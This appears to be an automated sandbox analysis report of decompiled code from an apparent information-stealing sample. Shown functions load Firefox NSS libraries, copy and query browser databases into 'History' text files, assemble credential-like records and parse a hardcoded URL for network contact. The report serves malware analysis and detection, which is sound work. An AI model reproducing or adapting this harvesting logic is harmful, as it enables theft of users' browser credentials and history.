                                                                    						_t278 = _t335 - 0x1a4;
                                                                    						E0040440A(_t335 - 0x1a4, _t335 - 0x134, 0, _t319);
                                                                    						_t266 = 0;
                                                                    					}
                                                                    					_t185 = E0040C00F(_t335 - 0x134,  *0x445d88, _t326 + 1);
                                                                    					_t328 = _t185;
                                                                    					if(_t185 != _t319) {
                                                                    						E0040453E(_t335 - 0x134, _t266, 9);
                                                                    						_t306 =  *((intOrPtr*)(_t335 - 0x134));
                                                                    						if( *((intOrPtr*)(_t335 - 0x120)) < 0x10) {
                                                                    							_t306 = _t335 - 0x134;
                                                                    						}
                                                                    						_t251 =  *((intOrPtr*)(_t335 - 0x124));
                                                                    						_t314 = _t306 +  *((intOrPtr*)(_t335 - 0x124));
                                                                    						_t307 =  *((intOrPtr*)(_t335 - 0x134));
                                                                    						if( *((intOrPtr*)(_t335 - 0x120)) < 0x10) {
                                                                    							_t307 = _t335 - 0x134;
                                                                    						}
                                                                    						E00413770(_t335 - 0x134, _t335 - 0x20c, _t251 + _t307 + 0xfffffff9, _t314);
                                                                    						_t278 = _t335 - 0x188;
                                                                    						E0040440A(_t335 - 0x188, _t335 - 0x134, 0, _t319);
                                                                    						_t266 = 0;
                                                                    					}
                                                                    					_t187 = E0040C00F(_t335 - 0x134,  *0x445efc, _t328 + 1);
                                                                    					_t330 = _t187;
                                                                    					if(_t187 != _t319) {
                                                                    						E0040453E(_t335 - 0x134, _t266, 9);
                                                                    						_t303 =  *((intOrPtr*)(_t335 - 0x134));
                                                                    						if( *((intOrPtr*)(_t335 - 0x120)) < 0x10) {
                                                                    							_t303 = _t335 - 0x134;
                                                                    						}
                                                                    						_t243 =  *((intOrPtr*)(_t335 - 0x124));
                                                                    						_t313 =  *((intOrPtr*)(_t335 - 0x124)) + _t303;
                                                                    						_t304 =  *((intOrPtr*)(_t335 - 0x134));
                                                                    						if( *((intOrPtr*)(_t335 - 0x120)) < 0x10) {
                                                                    							_t304 = _t335 - 0x134;
                                                                    						}
                                                                    						E00413770(_t335 - 0x134, _t335 - 0x210, _t243 + _t304 + 0xfffffff9, _t313);
                                                                    						_t278 = _t335 - 0x16c;
                                                                    						E0040440A(_t335 - 0x16c, _t335 - 0x134, 0, _t319);
                                                                    						_t266 = 0;
                                                                    					}
                                                                    					_t189 = E0040C00F(_t335 - 0x134,  *0x445f40, _t330 + 1);
                                                                    					 *((intOrPtr*)(_t335 - 0x1fc)) = _t189;
                                                                    					if(_t189 != _t319) {
                                                                    						E0040453E(_t335 - 0x134, _t266, 0x1b);
                                                                    						_t300 =  *((intOrPtr*)(_t335 - 0x134));
                                                                    						if( *((intOrPtr*)(_t335 - 0x120)) < 0x10) {
                                                                    							_t300 = _t335 - 0x134;
                                                                    						}
                                                                    						_t356 =  *((intOrPtr*)(_t335 - 0x120)) - 0x10;
                                                                    						_t232 =  *((intOrPtr*)(_t335 - 0x124));
                                                                    						_t312 =  *((intOrPtr*)(_t335 - 0x124)) + _t300;
                                                                    						_t301 =  *((intOrPtr*)(_t335 - 0x134));
                                                                    						if( *((intOrPtr*)(_t335 - 0x120)) < 0x10) {
                                                                    							_t301 = _t335 - 0x134;
                                                                    						}
                                                                    						E00413770(_t335 - 0x134, _t335 - 0x208, _t232 + _t301 + 0xfffffff9, _t312);
                                                                    						_t336 = _t336 - 0x1c;
                                                                    						 *((intOrPtr*)(_t335 - 0x200)) = _t336;
                                                                    						E00404778(_t336, _t335 - 0x134);
                                                                    						_t239 = E00415C74(_t335 - 0x208, _t335 - 0x1f8, _t336, _t356);
                                                                    						_t319 = _t335 - 0x150;
                                                                    						 *(_t335 - 4) = 6;
                                                                    						E004042ED(_t319, _t239);
                                                                    						_t278 = _t335 - 0x1f8;
                                                                    						 *(_t335 - 4) = 5;
                                                                    						E00404354(_t335 - 0x1f8, 1, 0);
                                                                    						_t266 = 0;
                                                                    					}
                                                                    					if(E0040C0F9( *((intOrPtr*)(_t335 - 0x194)), _t335 - 0x1a4, 0x43c8d8, _t266) != 0 && E0040C0F9( *((intOrPtr*)(_t335 - 0x178)), _t335 - 0x188, 0x43c8d8, _t266) != 0 && E0040C0F9( *((intOrPtr*)(_t335 - 0x15c)), _t335 - 0x16c, 0x43c8d8, _t266) != 0) {
                                                                    						_t209 = E0040C0F9( *((intOrPtr*)(_t335 - 0x140)), _t335 - 0x150, 0x43c8d8, _t266);
                                                                    						_t361 = _t209;
                                                                    						if(_t209 != 0) {
                                                                    							lstrcatA( *0x446250,  *0x446148);
                                                                    							lstrcatA( *0x446250,  *0x446100);
                                                                    							_push(":");
                                                                    							_push(_t335 - 0x1c0);
                                                                    							_t213 = E0040C233(_t266, _t335 - 0x1a4, 0x43c8d8, _t361);
                                                                    							 *(_t335 - 4) = 7;
                                                                    							_t214 = E0040D66C(_t213, _t213, _t335 - 0x1dc, _t335 - 0x188);
                                                                    							_t336 = _t336 + 0x10;
                                                                    							 *(_t335 - 4) = 8;
                                                                    							if(_t214[0x14] >= 0x10) {
                                                                    								_t214 =  *_t214;
                                                                    							}
                                                                    							lstrcatA( *0x446250, _t214);
                                                                    							E00404354(_t335 - 0x1dc, 1, _t266);
                                                                    							 *(_t335 - 4) = 5;
                                                                    							E00404354(_t335 - 0x1c0, 1, _t266);
                                                                    							_t319 = 0x43c8dc;
                                                                    							lstrcatA( *0x446250, 0x43c8dc);
                                                                    							lstrcatA( *0x446250,  *0x445c48);
                                                                    							_t220 =  *(_t335 - 0x16c);
                                                                    							if( *((intOrPtr*)(_t335 - 0x158)) < 0x10) {
                                                                    								_t220 = _t335 - 0x16c;
                                                                    							}
                                                                    							lstrcatA( *0x446250, _t220);
                                                                    							lstrcatA( *0x446250, _t319);
                                                                    							lstrcatA( *0x446250,  *0x4460c4);
                                                                    							_t364 =  *((intOrPtr*)(_t335 - 0x13c)) - 0x10;
                                                                    							_t224 =  *(_t335 - 0x150);
                                                                    							if( *((intOrPtr*)(_t335 - 0x13c)) < 0x10) {
                                                                    								_t224 = _t335 - 0x150;
                                                                    							}
                                                                    							lstrcatA( *0x446250, _t224);
                                                                    							lstrcatA( *0x446250, "\n\n");
                                                                    							E00404396(_t335 - 0x1a4, _t364, 0x43c8d8, _t266);
                                                                    							E00404396(_t335 - 0x188, _t364, 0x43c8d8, _t266);
                                                                    							E00404396(_t335 - 0x16c, _t364, 0x43c8d8, _t266);
                                                                    							_t278 = _t335 - 0x150;
                                                                    							E00404396(_t335 - 0x150, _t364, 0x43c8d8, _t266);
                                                                    							 *0x446230 =  *0x446230 + 1;
                                                                    							_t365 =  *0x446230;
                                                                    						}
                                                                    					}
                                                                    					_push(0xa);
                                                                    					_push(_t335 +  *((intOrPtr*)( *((intOrPtr*)(_t335 - 0x2c0)) + 4)) - 0x2c0);
                                                                    					_push(E00414754(_t266, _t278, _t319, 0x43c8d8, _t365) & 0x000000ff);
                                                                    					_push(_t335 - 0x2c0);
                                                                    					_t198 = E00414B0D(_t266, _t335 - 0x134, _t319, 0x43c8d8, _t365);
                                                                    					_t278 =  *((intOrPtr*)( *_t198 + 4)) + _t198;
                                                                    					asm("sbb eax, eax");
                                                                    					if(( *((intOrPtr*)( *_t198 + 4)) + _t198 &  !( ~( *( *((intOrPtr*)( *_t198 + 4)) + _t198 + 0xc) & 0x00000006))) == 0) {
                                                                    						goto L43;
                                                                    					}
                                                                    					_t323 =  *((intOrPtr*)(_t335 - 0x1fc));
                                                                    				}
                                                                    				goto L43;
                                                                    			}


                                                                    APIs
                                                                    • __EH_prolog3_GS.LIBCMT ref: 00410686
                                                                    • lstrcatA.KERNEL32(?,00000000,000002B4,004135AD,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004106AD
                                                                    • lstrcatA.KERNEL32(?), ref: 004106C0
                                                                    • GetFileAttributesA.KERNEL32(?), ref: 004106CD
                                                                      • Part of subcall function 0040440A: std::_Xinvalid_argument.LIBCPMT ref: 00404424
                                                                      • Part of subcall function 0040453E: std::_Xinvalid_argument.LIBCPMT ref: 00404551
                                                                      • Part of subcall function 0040453E: _memmove.LIBCMT ref: 0040458C
                                                                    • lstrcatA.KERNEL32(0043C8D8,00000000,0043C8D8,00000000,0043C8D8,00000000,0043C8D8,00000000,00000001,00000000,?,00000001,?,00000001,?,0000000A), ref: 00410A95
                                                                    • lstrcatA.KERNEL32 ref: 00410AA7
                                                                    • lstrcatA.KERNEL32(00000000), ref: 00410AF3
                                                                    • lstrcatA.KERNEL32(0043C8DC,00000001,00000000,00000001,00000000), ref: 00410B25
                                                                    • lstrcatA.KERNEL32 ref: 00410B37
                                                                    • lstrcatA.KERNEL32(?), ref: 00410B59
                                                                    • lstrcatA.KERNEL32(0043C8DC), ref: 00410B66
                                                                    • lstrcatA.KERNEL32 ref: 00410B78
                                                                    • lstrcatA.KERNEL32(?), ref: 00410B9A
                                                                    • lstrcatA.KERNEL32(0043EC3C), ref: 00410BAB
                                                                      • Part of subcall function 00404396: _memmove.LIBCMT ref: 004043E7
                                                                      • Part of subcall function 00414754: __EH_prolog3.LIBCMT ref: 0041475B
                                                                      • Part of subcall function 00414B0D: __EH_prolog3_catch.LIBCMT ref: 00414B14
                                                                    • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00410C9C
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: lstrcat$Xinvalid_argument_memmovestd::_$AttributesFileH_prolog3H_prolog3_H_prolog3_catchIos_base_dtorstd::ios_base::_
                                                                    • String ID:
                                                                    • API String ID: 3833189730-0
                                                                    • Opcode ID: 65636018cc3ec7c083148f8f99303f23e5727c7612be57699a412aac3b354b41
                                                                    • Instruction ID: 3b3c47d6d2e68956d0805454a379188081003d6f486aa7feea72118526a2cbaf
                                                                    • Opcode Fuzzy Hash: 65636018cc3ec7c083148f8f99303f23e5727c7612be57699a412aac3b354b41
                                                                    • Instruction Fuzzy Hash: FDF139719011289FDB25EB65CD85FEAB778AF4A304F0001EAE109A7192DB746FC5CF58
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 77%
                                                                    			E0040B63D(void* __ebx, void* __edx, intOrPtr* __edi, void* __esi, void* __eflags) {
                                                                    				intOrPtr* _t48;
                                                                    				intOrPtr* _t52;
                                                                    				intOrPtr* _t56;
                                                                    				intOrPtr* _t60;
                                                                    				intOrPtr* _t64;
                                                                    				intOrPtr* _t68;
                                                                    				void* _t121;
                                                                    				intOrPtr _t123;
                                                                    
                                                                    				_t107 = __edi;
                                                                    				_push(0x3c);
                                                                    				E0042083E(E00434D6B, __ebx, __edi, __esi);
                                                                    				 *((intOrPtr*)(_t121 - 0x34)) = 0xf;
                                                                    				 *((intOrPtr*)(_t121 - 0x38)) = 0;
                                                                    				 *((char*)(_t121 - 0x48)) = 0;
                                                                    				E00404331(_t121 - 0x48,  *0x445fe0);
                                                                    				 *((intOrPtr*)(_t121 - 4)) = 0;
                                                                    				_t123 =  *0x4465fc; // 0x0
                                                                    				if(_t123 == 0) {
                                                                    					_push("\\vcruntime140.dll");
                                                                    					_push(_t121 - 0x2c);
                                                                    					_t48 = E0040C233(1, _t121 - 0x48, 0, _t123);
                                                                    					 *((char*)(_t121 - 4)) = 1;
                                                                    					_t124 =  *((intOrPtr*)(_t48 + 0x14)) - 0x10;
                                                                    					if( *((intOrPtr*)(_t48 + 0x14)) >= 0x10) {
                                                                    						_t48 =  *_t48;
                                                                    					}
                                                                    					E0040AC0F(1, _t48, 1);
                                                                    					 *((char*)(_t121 - 4)) = 0;
                                                                    					E00404354(_t121 - 0x2c, 1, 0);
                                                                    					_push("\\softokn3.dll");
                                                                    					_push(_t121 - 0x2c);
                                                                    					_t52 = E0040C233(1, _t121 - 0x48, 0, _t124);
                                                                    					 *((char*)(_t121 - 4)) = 2;
                                                                    					_t125 =  *((intOrPtr*)(_t52 + 0x14)) - 0x10;
                                                                    					if( *((intOrPtr*)(_t52 + 0x14)) >= 0x10) {
                                                                    						_t52 =  *_t52;
                                                                    					}
                                                                    					E0040AC0F(1, _t52, 1);
                                                                    					 *((char*)(_t121 - 4)) = 0;
                                                                    					E00404354(_t121 - 0x2c, 1, 0);
                                                                    					_push("\\nss3.dll");
                                                                    					_push(_t121 - 0x2c);
                                                                    					_t56 = E0040C233(1, _t121 - 0x48, 0, _t125);
                                                                    					 *((char*)(_t121 - 4)) = 3;
                                                                    					_t126 =  *((intOrPtr*)(_t56 + 0x14)) - 0x10;
                                                                    					if( *((intOrPtr*)(_t56 + 0x14)) >= 0x10) {
                                                                    						_t56 =  *_t56;
                                                                    					}
                                                                    					E0040AC0F(1, _t56, 1);
                                                                    					 *((char*)(_t121 - 4)) = 0;
                                                                    					E00404354(_t121 - 0x2c, 1, 0);
                                                                    					_push("\\msvcp140.dll");
                                                                    					_push(_t121 - 0x2c);
                                                                    					_t60 = E0040C233(1, _t121 - 0x48, 0, _t126);
                                                                    					 *((char*)(_t121 - 4)) = 4;
                                                                    					_t127 =  *((intOrPtr*)(_t60 + 0x14)) - 0x10;
                                                                    					if( *((intOrPtr*)(_t60 + 0x14)) >= 0x10) {
                                                                    						_t60 =  *_t60;
                                                                    					}
                                                                    					E0040AC0F(1, _t60, 1);
                                                                    					 *((char*)(_t121 - 4)) = 0;
                                                                    					E00404354(_t121 - 0x2c, 1, 0);
                                                                    					_push("\\mozglue.dll");
                                                                    					_push(_t121 - 0x2c);
                                                                    					_t64 = E0040C233(1, _t121 - 0x48, 0, _t127);
                                                                    					 *((char*)(_t121 - 4)) = 5;
                                                                    					_t128 =  *((intOrPtr*)(_t64 + 0x14)) - 0x10;
                                                                    					if( *((intOrPtr*)(_t64 + 0x14)) >= 0x10) {
                                                                    						_t64 =  *_t64;
                                                                    					}
                                                                    					E0040AC0F(1, _t64, 1);
                                                                    					 *((char*)(_t121 - 4)) = 0;
                                                                    					E00404354(_t121 - 0x2c, 1, 0);
                                                                    					_push("\\freebl3.dll");
                                                                    					_push(_t121 - 0x2c);
                                                                    					_t68 = E0040C233(1, _t121 - 0x48, 0, _t128);
                                                                    					 *((char*)(_t121 - 4)) = 6;
                                                                    					if( *((intOrPtr*)(_t68 + 0x14)) >= 0x10) {
                                                                    						_t68 =  *_t68;
                                                                    					}
                                                                    					_t107 = _t68;
                                                                    					E0040AC0F(1, _t68, 1);
                                                                    					E00404354(_t121 - 0x2c, 1, 0);
                                                                    					 *0x4465fc = 1;
                                                                    				}
                                                                    				E00404354(_t121 - 0x48, 1, 0);
                                                                    				return E00420888(1, _t107, 0);
                                                                    			}












                                                                    APIs
                                                                    • __EH_prolog3_GS.LIBCMT ref: 0040B644
                                                                      • Part of subcall function 0040C233: __EH_prolog3.LIBCMT ref: 0040C23A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: H_prolog3H_prolog3_
                                                                    • String ID: \freebl3.dll$\mozglue.dll$\msvcp140.dll$\nss3.dll$\softokn3.dll$\vcruntime140.dll$freebl3.dll$mozglue.dll$msvcp140.dll$nss3.dll$softokn3.dll$vcruntime140.dll
                                                                    • API String ID: 3355343447-1404205017
                                                                    • Opcode ID: d57ff7226d1bc0613194851ebd95542abedc3ae522f5376bae662bb496100257
                                                                    • Instruction ID: 7bfe6ccb24835a4369a3d6b14c4e6b5a1dfccb5b404d9dbd553563100066fc49
                                                                    • Opcode Fuzzy Hash: d57ff7226d1bc0613194851ebd95542abedc3ae522f5376bae662bb496100257
                                                                    • Instruction Fuzzy Hash: 9451CF72805204AFDB08EBEAD445BCE7BB8DF49314F10507FE015B71D2DB785A85CAAA
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 47%
                                                                    			E0040F505(CHAR* __ebx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                    				signed int _v8;
                                                                    				char _v276;
                                                                    				char _v540;
                                                                    				char _v544;
                                                                    				char _v548;
                                                                    				intOrPtr _v552;
                                                                    				intOrPtr _v556;
                                                                    				intOrPtr _v560;
                                                                    				void* __edi;
                                                                    				void* __esi;
                                                                    				signed int _t29;
                                                                    				void* _t38;
                                                                    				void* _t50;
                                                                    				void* _t55;
                                                                    				CHAR* _t62;
                                                                    				void* _t76;
                                                                    				signed int _t79;
                                                                    				void* _t80;
                                                                    				void* _t83;
                                                                    				void* _t84;
                                                                    				void* _t86;
                                                                    
                                                                    				_t69 = __ebx;
                                                                    				_t29 =  *0x443674; // 0x393162b1
                                                                    				_v8 = _t29 ^ _t79;
                                                                    				_v556 = _a4;
                                                                    				_v552 = _a8;
                                                                    				_t78 = 0x104;
                                                                    				_v560 = _a12;
                                                                    				E00426300( &_v276, 0, 0x104);
                                                                    				lstrcatA( &_v276,  *0x445fe0);
                                                                    				_t38 = 0x1a;
                                                                    				lstrcatA( &_v276, E00415EF6(_t38, _t86));
                                                                    				CopyFileA(__ebx,  &_v276, 1);
                                                                    				E00426300( &_v540, 0, 0x104);
                                                                    				wsprintfA( &_v540, "\\History\\%s_%s.txt", _v552, _v556);
                                                                    				_t50 =  *0x446248( &_v276,  &_v548);
                                                                    				_t83 = _t80 + 0x30;
                                                                    				if(_t50 == 0) {
                                                                    					_t55 =  *0x4461fc(_v548,  *0x445e30, 0xffffffff,  &_v544, 0);
                                                                    					_t84 = _t83 + 0x14;
                                                                    					if(_t55 == 0) {
                                                                    						_t78 = HeapAlloc(GetProcessHeap(), 0, 0xf423f);
                                                                    						while(1) {
                                                                    							_push(_v544);
                                                                    							if( *0x446218() != 0x64) {
                                                                    								break;
                                                                    							}
                                                                    							 *0x446238(_v544, 0);
                                                                    							_t62 =  *0x446238(_v544, 0);
                                                                    							_t84 = _t84 + 0x10;
                                                                    							lstrcatA(_t78, _t62);
                                                                    							lstrcatA(_t78, 0x43c8dc);
                                                                    						}
                                                                    						E0041CE7C(_v560,  &_v540,  *0x446320(_t78), 3);
                                                                    					}
                                                                    					 *0x44621c(_v544);
                                                                    					 *0x44624c(_v548);
                                                                    				}
                                                                    				return E0041DA9B(DeleteFileA( &_v276), _t69, _v8 ^ _t79, _t76, 0, _t78);
                                                                    			}

























                                                                    APIs
                                                                    • _memset.LIBCMT ref: 0040F545
                                                                    • lstrcatA.KERNEL32(?,?,?,?), ref: 0040F55A
                                                                      • Part of subcall function 00415EF6: _malloc.LIBCMT ref: 00415EFC
                                                                      • Part of subcall function 00415EF6: GetTickCount.KERNEL32 ref: 00415F07
                                                                      • Part of subcall function 00415EF6: _rand.LIBCMT ref: 00415F1C
                                                                      • Part of subcall function 00415EF6: wsprintfA.USER32 ref: 00415F2F
                                                                    • lstrcatA.KERNEL32(?,00000000,?,?,?), ref: 0040F570
                                                                    • CopyFileA.KERNEL32(?,?,00000001), ref: 0040F580
                                                                    • _memset.LIBCMT ref: 0040F58F
                                                                    • wsprintfA.USER32 ref: 0040F5AF
                                                                    • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 0040F5FD
                                                                    • HeapAlloc.KERNEL32(00000000), ref: 0040F604
                                                                    • lstrcatA.KERNEL32(00000000,00000000), ref: 0040F62D
                                                                    • lstrcatA.KERNEL32(00000000,0043C8DC), ref: 0040F639
                                                                    • lstrlen.KERNEL32(00000000), ref: 0040F652
                                                                    • DeleteFileA.KERNEL32(?), ref: 0040F693
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: lstrcat$FileHeap_memsetwsprintf$AllocCopyCountDeleteProcessTick_malloc_randlstrlen
                                                                    • String ID: \History\%s_%s.txt
                                                                    • API String ID: 3976021866-3864739126
                                                                    • Opcode ID: 7757212110dec492b3089eadb4235f16282ff018e33efc736dc8abd87155c47c
                                                                    • Instruction ID: d352fc9d1db243d10f2f8d57e291d8bd9c9339a07b22dd591e9f4189da6c75f7
                                                                    • Opcode Fuzzy Hash: 7757212110dec492b3089eadb4235f16282ff018e33efc736dc8abd87155c47c
                                                                    • Instruction Fuzzy Hash: 1A416D76900118BBCB21AFA4EC4DEDEBBBCBB0A300F1104B6F505E2161DB759A858F59
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 25%
                                                                    			E0040FE87(CHAR* __ebx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                    				signed int _v8;
                                                                    				char _v276;
                                                                    				char _v540;
                                                                    				char _v544;
                                                                    				char _v548;
                                                                    				intOrPtr _v552;
                                                                    				intOrPtr _v556;
                                                                    				intOrPtr _v560;
                                                                    				void* __edi;
                                                                    				void* __esi;
                                                                    				signed int _t28;
                                                                    				void* _t37;
                                                                    				void* _t76;
                                                                    				CHAR* _t79;
                                                                    				signed int _t80;
                                                                    				void* _t87;
                                                                    
                                                                    				_t67 = __ebx;
                                                                    				_t28 =  *0x443674; // 0x393162b1
                                                                    				_v8 = _t28 ^ _t80;
                                                                    				_v556 = _a4;
                                                                    				_v552 = _a8;
                                                                    				_v560 = _a12;
                                                                    				E00426300( &_v276, 0, 0x104);
                                                                    				lstrcatA( &_v276,  *0x445fe0);
                                                                    				_t37 = 0x1a;
                                                                    				lstrcatA( &_v276, E00415EF6(_t37, _t87));
                                                                    				CopyFileA(__ebx,  &_v276, 1);
                                                                    				E00426300( &_v540, 0, 0x104);
                                                                    				wsprintfA( &_v540, "\\History\\%s_%s.txt", _v552, _v556);
                                                                    				_t79 =  *0x445c8c; // 0x4c9c150
                                                                    				_push( &_v548);
                                                                    				_push( &_v276);
                                                                    				if( *0x446248() == 0) {
                                                                    					_push(0);
                                                                    					_push( &_v544);
                                                                    					_push(0xffffffff);
                                                                    					_push(_t79);
                                                                    					_push(_v548);
                                                                    					if( *0x4461fc() == 0) {
                                                                    						_t79 = HeapAlloc(GetProcessHeap(), 0, 0xf423f);
                                                                    						while(1) {
                                                                    							_push(_v544);
                                                                    							if( *0x446218() != 0x64) {
                                                                    								break;
                                                                    							}
                                                                    							lstrcatA(_t79,  *0x446238(_v544, 0));
                                                                    							lstrcatA(_t79, 0x43c8dc);
                                                                    						}
                                                                    						E0041CE7C(_v560,  &_v540,  *0x446320(_t79), 3);
                                                                    					}
                                                                    					 *0x44621c(_v544);
                                                                    					 *0x44624c(_v548);
                                                                    				}
                                                                    				return E0041DA9B(DeleteFileA( &_v276), _t67, _v8 ^ _t80, _t76, 0, _t79);
                                                                    			}


                                                                    APIs
                                                                    • _memset.LIBCMT ref: 0040FEC7
                                                                    • lstrcatA.KERNEL32(?,?,004132CB,0043C8D8), ref: 0040FEDC
                                                                      • Part of subcall function 00415EF6: _malloc.LIBCMT ref: 00415EFC
                                                                      • Part of subcall function 00415EF6: GetTickCount.KERNEL32 ref: 00415F07
                                                                      • Part of subcall function 00415EF6: _rand.LIBCMT ref: 00415F1C
                                                                      • Part of subcall function 00415EF6: wsprintfA.USER32 ref: 00415F2F
                                                                    • lstrcatA.KERNEL32(?,00000000,?,004132CB,0043C8D8), ref: 0040FEF2
                                                                    • CopyFileA.KERNEL32(?,?,00000001), ref: 0040FF02
                                                                    • _memset.LIBCMT ref: 0040FF11
                                                                    • wsprintfA.USER32 ref: 0040FF31
                                                                    • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 0040FF80
                                                                    • HeapAlloc.KERNEL32(00000000), ref: 0040FF87
                                                                    • lstrcatA.KERNEL32(00000000,00000000), ref: 0040FFA2
                                                                    • lstrcatA.KERNEL32(00000000,0043C8DC), ref: 0040FFAE
                                                                    • lstrlen.KERNEL32(00000000), ref: 0040FFC7
                                                                    • DeleteFileA.KERNEL32(?), ref: 00410008
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: lstrcat$FileHeap_memsetwsprintf$AllocCopyCountDeleteProcessTick_malloc_randlstrlen
                                                                    • String ID: \History\%s_%s.txt
                                                                    • API String ID: 3976021866-3864739126
                                                                    • Opcode ID: a431df1ee6fe96b82f1b268a9de907cf900087e2419cdd68be891ee51ada8166
                                                                    • Instruction ID: aa68e05fefaab03702a46bb310ec89032731398b9155d2223b23027662571230
                                                                    • Opcode Fuzzy Hash: a431df1ee6fe96b82f1b268a9de907cf900087e2419cdd68be891ee51ada8166
                                                                    • Instruction Fuzzy Hash: 63413D76900118BBCB11ABA4EC49EDEBBBCEB0A315F1100B6F905E2161DA759A848F59
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 67%
                                                                    			E0040ACB9(intOrPtr* _a4) {
                                                                    				long _v8;
                                                                    				char _v16;
                                                                    				signed int _v24;
                                                                    				char _v1024;
                                                                    				char _v2024;
                                                                    				char _v3024;
                                                                    				char _v8024;
                                                                    				char _v8052;
                                                                    				char _v8080;
                                                                    				char _v8108;
                                                                    				intOrPtr* _v8112;
                                                                    				intOrPtr _v8116;
                                                                    				intOrPtr _v8120;
                                                                    				signed short _v8156;
                                                                    				signed int _v8160;
                                                                    				CHAR* _v8164;
                                                                    				signed int _v8172;
                                                                    				CHAR* _v8176;
                                                                    				void* _v8180;
                                                                    				void* __ebx;
                                                                    				void* __edi;
                                                                    				void* __esi;
                                                                    				void* __ebp;
                                                                    				signed int _t65;
                                                                    				signed int _t66;
                                                                    				intOrPtr* _t68;
                                                                    				char* _t70;
                                                                    				char* _t71;
                                                                    				char* _t72;
                                                                    				char* _t73;
                                                                    				char* _t74;
                                                                    				char* _t77;
                                                                    				intOrPtr* _t90;
                                                                    				CHAR* _t94;
                                                                    				char* _t100;
                                                                    				char* _t101;
                                                                    				char* _t102;
                                                                    				char* _t103;
                                                                    				void* _t105;
                                                                    				void* _t107;
                                                                    				void* _t118;
                                                                    				void* _t120;
                                                                    				void* _t121;
                                                                    				void* _t122;
                                                                    				intOrPtr* _t127;
                                                                    				void* _t133;
                                                                    				void* _t134;
                                                                    				char* _t139;
                                                                    				void* _t140;
                                                                    				void* _t141;
                                                                    				void* _t142;
                                                                    				void* _t143;
                                                                    				void* _t144;
                                                                    				intOrPtr* _t145;
                                                                    				void* _t146;
                                                                    				void* _t148;
                                                                    				CHAR* _t150;
                                                                    				void* _t155;
                                                                    				signed int _t156;
                                                                    				void* _t157;
                                                                    				void* _t158;
                                                                    				char* _t159;
                                                                    
                                                                    				_push(0xffffffff);
                                                                    				_push(E00434237);
                                                                    				_push( *[fs:0x0]);
                                                                    				E0042E300(0x1fe8);
                                                                    				_t65 =  *0x443674; // 0x393162b1
                                                                    				_t66 = _t65 ^ _t156;
                                                                    				_v24 = _t66;
                                                                    				_push(_t144);
                                                                    				_push(_t66);
                                                                    				 *[fs:0x0] =  &_v16;
                                                                    				_t68 = _a4;
                                                                    				_t148 = 0x3c;
                                                                    				_v8120 =  *_t68;
                                                                    				_v8116 =  *((intOrPtr*)(_t68 + 4));
                                                                    				_t120 = _t148;
                                                                    				_t70 =  &_v8180;
                                                                    				do {
                                                                    					 *_t70 = 0;
                                                                    					_t70 = _t70 + 1;
                                                                    					_t120 = _t120 - 1;
                                                                    				} while (_t120 != 0);
                                                                    				_t121 = 0x1388;
                                                                    				_t71 =  &_v8024;
                                                                    				do {
                                                                    					 *_t71 = 0;
                                                                    					_t71 = _t71 + 1;
                                                                    					_t121 = _t121 - 1;
                                                                    				} while (_t121 != 0);
                                                                    				_t122 = 0x3e8;
                                                                    				_t140 = 0x3e8;
                                                                    				_t72 =  &_v2024;
                                                                    				do {
                                                                    					 *_t72 = 0;
                                                                    					_t72 = _t72 + 1;
                                                                    					_t140 = _t140 - 1;
                                                                    				} while (_t140 != 0);
                                                                    				_t141 = 0x3e8;
                                                                    				_t73 =  &_v3024;
                                                                    				do {
                                                                    					 *_t73 = 0;
                                                                    					_t73 = _t73 + 1;
                                                                    					_t141 = _t141 - 1;
                                                                    				} while (_t141 != 0);
                                                                    				_t74 =  &_v1024;
                                                                    				do {
                                                                    					 *_t74 = 0;
                                                                    					_t74 = _t74 + 1;
                                                                    					_t122 = _t122 - 1;
                                                                    					_t166 = _t122;
                                                                    				} while (_t122 != 0);
                                                                    				_v8172 = _v8172 | 0xffffffff;
                                                                    				_v8160 = _v8160 | 0xffffffff;
                                                                    				_v8180 = _t148;
                                                                    				_v8164 = E0041D05B(0, _t141, _t144, 0x400, _t166, 0x400);
                                                                    				_v8176 = E0041D05B(0, _t141, _t144, 0x400, _t166, 0x400);
                                                                    				_t77 =  *0x4442dc; // 0x4be1588
                                                                    				_t150 = 0x4442dc;
                                                                    				if( *0x4442f0 < 0x10) {
                                                                    					_t77 = 0x4442dc;
                                                                    				}
                                                                    				if(InternetCrackUrlA(_t77,  *0x4442ec, 0,  &_v8180) != 0) {
                                                                    					wsprintfA( &_v2024, "%d", _v8156 & 0x0000ffff);
                                                                    					_t157 = _t157 + 0xc;
                                                                    					lstrcatA( &_v3024, _v8164);
